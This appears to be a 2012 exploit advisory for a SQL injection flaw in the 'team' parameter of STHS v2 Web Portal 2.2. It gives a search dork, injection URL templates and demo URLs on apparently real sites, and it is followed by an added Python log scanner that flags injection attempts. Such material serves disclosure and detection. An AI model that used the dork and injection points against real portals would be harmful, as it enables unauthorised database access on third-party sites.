STHS v2 Web Portal version 2.2 suffers from a remote SQL injection vulnerability.
=================================================
STHS v2 Web Portal 2.2 SQL Injection Vulnerability
=================================================
>> The Underground Exploitation Team
[+] Site : http://www.Dis9.com
I'm Liyan Oz Member from 1337 DataBase
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#
# Author : Liyan Oz
# Title : STHS v2 Web Portal 2.2 SQL Injection Vulnerability
# Vendor : http://www.simhl.net
# Date : 10/02/2012
# Risk : Normal
# Tested On : Backtrack Liyan Oz Edition
# Contact : ariestiyansyah.rizky@gmail.com
# Home : http://0nto.wordpress.com/
# Dork : "powered by SIMHL.net"
#
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#
# Exploit :
http://www.site.com/prospects.php?team=[SQLi]'
http://www.site.org/prospect.php?team=[SQLi]'
http://www.site.net/team.php?team=[SQLi]'
# Demo :
http://lnhs2.hostpo.net/prospect.php?team=1'
http://www.lchv.biz/prospects.php?team=17'
# Greetz to
========================================================================
# = My Lovely Junia Astri Damayanti =
#
# = Dis9 The Underground Exploitation Team [at] www.dis9.com =
#
# - Kedans Dz - Blackrootkit - Kalashinkov3 - KnockOut - Black-ID -
# - Kowalski Howard - 7h1nkz3r0 - ettack - Ackrootkit - ph0n7ric -
# - xi4ojin - Nimda - Killer - Dz - 2ext01 - Aoi Sora - X1 - brk -
#
# - Indonesian Backtrack Team , El N4ck0 , and all my friend ^_^ -
#=======================================================================
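
For operators of an affected portal, an added detection example (not part of the original advisory or the vendor's code): it scans web access logs for requests to the three scripts named above whose `team` parameter is not a plain integer. It assumes the combined log format and that a legitimate `team` value is a numeric ID, as in the advisory's URLs; the log lines and IP addresses are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts and parameter named in the advisory.
AFFECTED = {"prospects.php", "prospect.php", "team.php"}
PARAM = "team"

# Assumption: Apache/nginx combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def suspicious_team_value(target):
    """Return the decoded `team` value if it is not a plain integer on an
    affected script; return None for clean or unrelated requests."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    if script not in AFFECTED:
        return None
    # parse_qsl percent-decodes, so %27 and a raw quote are treated alike.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() == PARAM and not re.fullmatch(r"[0-9]{1,9}", value):
            return value
    return None

def scan(lines):
    """Return (client_ip, request_target, decoded_value, status) per hit."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        bad = suspicious_team_value(m.group("target"))
        if bad is not None:
            hits.append((m.group("ip"), m.group("target"), bad,
                         int(m.group("status"))))
    return hits

# Constructed sample log lines (documentation IP ranges).
SAMPLE_LOG = """
203.0.113.5 - - [10/Feb/2012:10:00:01 +0000] "GET /prospects.php?team=17 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Feb/2012:10:00:07 +0000] "GET /prospect.php?team=1%27 HTTP/1.1" 500 312
203.0.113.9 - - [10/Feb/2012:10:00:09 +0000] "GET /team.php?team=3' HTTP/1.1" 200 2048
198.51.100.4 - - [10/Feb/2012:10:01:00 +0000] "GET /index.php?team=x HTTP/1.1" 200 900
""".strip().splitlines()

if __name__ == "__main__":
    for ip, target, value, status in scan(SAMPLE_LOG):
        print(f"{ip} {status} {target} -> team={value!r}")
```

The same integer-only rule can be enforced at the application or WAF layer by rejecting any `team` value that fails the check before it reaches the database.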